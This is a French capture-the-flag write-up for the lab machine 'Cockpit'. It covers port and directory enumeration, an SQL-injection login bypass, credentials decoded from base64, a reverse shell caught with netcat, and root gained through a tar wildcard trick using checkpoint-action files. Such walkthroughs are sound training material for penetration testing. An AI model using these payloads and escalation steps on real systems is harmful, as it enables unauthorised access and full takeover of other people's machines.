# Cockpit

`SQLi` `Auth bypass` `Wildcard` `tar`

* Nom machine : Cockpit
* Difficulté : Intermédiaire
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-09 09:25 EDT
Nmap scan report for 192.168.242.10
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-title: blaze
|_http-server-header: Apache/2.4.41 (Ubuntu)
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-08-09T13:25:32
|_Not valid after:  2124-07-16T13:25:32
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|     margin: 0 0 10px;
|_    @font-face {
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94SVN%T=SSL%I=7%D=8/9%Time=66B61933%P=x86_64-pc-linux-
SF:gnu%r(GetRequest,E45,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Typ
SF:e:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-
SF:DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Co
SF:ntent-Type-Options:\x20nosniff\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\
SF:n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</tit
SF:le>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"
SF:text/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewpor
SF:t\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20
SF:\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x2
SF:0Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0font-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20l
SF:ine-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20margin:\x200\x200\x2010px;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20@font-face\x20{\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20")%r(HTTPOptions,E45,"HTTP/1\.1\x20400\x20B
SF:ad\x20request\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfe
SF:r-Encoding:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Po
SF:licy:\x20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\n\r\n29\r\
SF:n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBa
SF:d\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"
SF:Content-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20\x2
SF:0\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini
SF:tial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDisplay\",\x20\"Open
SF:\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20line-height:\x201\.66666667;\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200\x200\x20
SF:10px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20@font-face\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

Nous tombons sur une page web.

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.242.10/ 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.242.10/__24-08-09_09-26-26.txt

Target: http://192.168.242.10/

[09:26:26] Starting: 
[09:26:29] 403 -  279B  - /.ht_wsr.txt
[09:26:29] 403 -  279B  - /.htaccess.bak1
[09:26:29] 403 -  279B  - /.htaccess.sample
[09:26:29] 403 -  279B  - /.htaccess.orig
[09:26:29] 403 -  279B  - /.htaccess.save
[09:26:29] 403 -  279B  - /.htaccess_sc
[09:26:29] 403 -  279B  - /.htaccess_extra
[09:26:29] 403 -  279B  - /.htaccessBAK
[09:26:29] 403 -  279B  - /.htaccessOLD
[09:26:29] 403 -  279B  - /.htaccess_orig
[09:26:29] 403 -  279B  - /.htaccessOLD2
[09:26:29] 403 -  279B  - /.htm
[09:26:29] 403 -  279B  - /.html
[09:26:29] 403 -  279B  - /.htpasswd_test
[09:26:29] 403 -  279B  - /.htpasswds
[09:26:29] 403 -  279B  - /.httr-oauth
[09:26:30] 301 -  313B  - /js  ->  http://192.168.242.10/js/
[09:26:31] 403 -  279B  - /.php
[09:26:42] 301 -  314B  - /css  ->  http://192.168.242.10/css/
[09:26:46] 301 -  314B  - /img  ->  http://192.168.242.10/img/
[09:26:47] 200 -  455B  - /js/
[09:26:47] 200 -  379B  - /login.php
[09:26:48] 302 -    0B  - /logout.php  ->  login.php
[09:26:57] 403 -  279B  - /server-status
[09:26:57] 403 -  279B  - /server-status/
```

login.php semble intéressant

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FuvWyOWlRoiWd1Le9aM2v%2Fed38ea987ea1b24fa96a2b40757a7cec.png?alt=media&#x26;token=2dc2773c-a73f-4f3d-84c9-d4c99fcc7823" alt=""><figcaption></figcaption></figure>

Nous avons essayé de bruteforce la page avec des listes courtes et burp suite mais sans succès.

#### Zeus-admin (9090)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FWnOXB4zcJcyJPyWEMkdb%2F207b61453b9c57b85a0c995c59a27abb.png?alt=media&#x26;token=125dad99-e788-4752-8691-9814b53f3da4" alt=""><figcaption></figcaption></figure>

Nous avons essayer plusieurs combinaison de nom d'utilisateur et de mot de passe : sans succès. Nous avons tenté ensuite de cliquer sur "Other Options", et avons rentré admin\@localhost. Nous avons un résultat et peu importe les crédentials utilisés.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FddkuTBUe8IFMXUB0GV1b%2F14fbfcd53198292d06b91f2b7bb69749.png?alt=media&#x26;token=3a1e75b6-0bdb-4bb8-a215-3e8184f8050f" alt=""><figcaption></figcaption></figure>

Qui n'abouti à rien... Ce qui est assez normal car on essaie de se connecter en ssh.

Nous allons retourner sur la page au port 80.

## Accès initial

Après recherche, nous trouvons un exploit pour Blaze

```
┌──(kali㉿kali)-[~]
└─$ searchsploit blaze
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Des | windows/remote/43993.py
Blaze Apps - Multiple Vulnerabilities                     | asp/webapps/12734.txt
Blaze Apps 1.x - SQL Injection / HTML Injection           | multiple/webapps/33995.txt
Blaze HDTV Player 6.0 - '.plf' Local Buffer Overflow (SEH | windows/local/9346.pl
BlazeBoard 1.0 - Information Disclosure                   | php/webapps/22901.txt
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflo | windows/remote/6217.pl
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overf | windows/local/13905.py
BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)           | windows/local/16618.rb
BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow  | windows/local/9329.pl
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Ov | windows/local/9360.pl
BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH | windows/local/13998.pl
BlazeDVD 6.0 - Local Buffer Overflow (Metasploit)         | windows/local/14077.rb
BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploi | windows/local/23783.rb
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)         | windows/local/29263.pl
BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow  | windows/local/48776.py
BlazeDVD 7.0.2 - Buffer Overflow (SEH)                    | windows/local/48329.py
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer O | windows/local/26889.pl
BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP  | windows/local/32737.pl
BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack B | windows/local/34331.py
BlazeDVD Pro Player 7.0 - '.plf' Local Buffer Overflow (S | windows/local/34371.py
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow | windows/local/2880.c
BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Ove | windows/remote/32129.cpp
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local O | windows/local/7975.py
BlazeVideo HDTV Player 6.6 Professional - Direct RETN     | windows/local/22931.py
BlazeVideo HDTV Player 6.6 Professional - Local Overflow  | windows/local/18693.py
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR  | windows/local/17939.py
BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metas | windows/local/23052.rb
BlazeVideo HDTV Player Standard - '.plf' File Remote Buff | windows/remote/38394.py
MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabil | hardware/webapps/34128.py
Outblaze Webmail - Cookie Authentication Bypass           | cgi/webapps/22364.c
Outblaze Webmail - HTML Injection                         | php/webapps/24291.txt
Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting | php/webapps/37095.txt
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                           
┌──(kali㉿kali)-[~]
└─$ searchsploit -m multiple/webapps/33995.txt
  Exploit: Blaze Apps 1.x - SQL Injection / HTML Injection
      URL: https://www.exploit-db.com/exploits/33995
     Path: /usr/share/exploitdb/exploits/multiple/webapps/33995.txt
    Codes: N/A
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/33995.txt

┌──(kali㉿kali)-[~]
└─$ cat /home/kali/33995.txt      
source: https://www.securityfocus.com/bid/40212/info

Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may exploit the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks.

The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Blaze Apps 1.4.0.051909 and prior are vulnerable.

HTML Injection

<script>alert('Stored XSS')</script>

SQL Injection

aa' OR [SQL] OR 'a'='1                                       
```

Nous allons tenter une injection SQL

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FmXdi9h0tz0GSbmF3JGIZ%2F38cda1c12457f7e107ad5e13534ee4d2.png?alt=media&#x26;token=fafc4693-483b-4dae-aa11-636d553bc604" alt=""><figcaption></figcaption></figure>

Oups, nous sommes bloqués. Quand nous essayons d'autre caractères spéciaux, un message d'erreur SQL apparaît. Nous allons tester avec une liste de payloads permettant de bypasser l'authentification.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/login-bypass#xpath-injection-authentication-bypass>" %}

Nous allons utiliser : `' or''='`

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FIwFggtE412jNe4T6xpHV%2F7600d679a1570c30a72eaabd6e764e16.png?alt=media&#x26;token=1e8e24ee-5300-450e-846e-857511438604" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ echo 'Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=' | base64 -d
canttouchhhthiss@455152                                                                                                
┌──(kali㉿kali)-[~]
└─$ echo 'dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy' | base64 -d
thisscanttbetouchedd@455152                                             
```

Nous avons maintenant deux utilisateurs et deux mots de passe. Revenons sur le port 9090.

Rentrons les crédentials de james. Bingo !

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FXXfbFhDezgxyTqemM7xZ%2F91580fa08803b74e3b03ce69f5ec3247.png?alt=media&#x26;token=90aa339c-90c6-4272-afac-9f8b56353940" alt=""><figcaption></figcaption></figure>

En fouillant un peu la page, on trouve un terminal...

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FMdxqXbQUh5V8pxoKVU7K%2F7059ec3d649aa50d297b99db1694a265.png?alt=media&#x26;token=7cc97272-9ae7-4c35-ba12-240771464a16" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234         
listening on [any] 1234 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.242.10] 54688
james@blaze:~$ whoami
whoami
james
```

## Elévation des privilèges

```
james@blaze:~$ sudo -l
sudo -l
Matching Defaults entries for james on blaze:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
```

{% embed url="<https://gtfobins.github.io/gtfobins/tar/#sudo>" %}

Privilège escalation très connu, abuser des wildcard...

```
james@blaze:/tmp$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
james@blaze:/tmp$ echo "" > --checkpoint-action=exec=sh
echo "" > --checkpoint-action=exec=sh
james@blaze:/tmp$ sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *
```

Nous sommes root !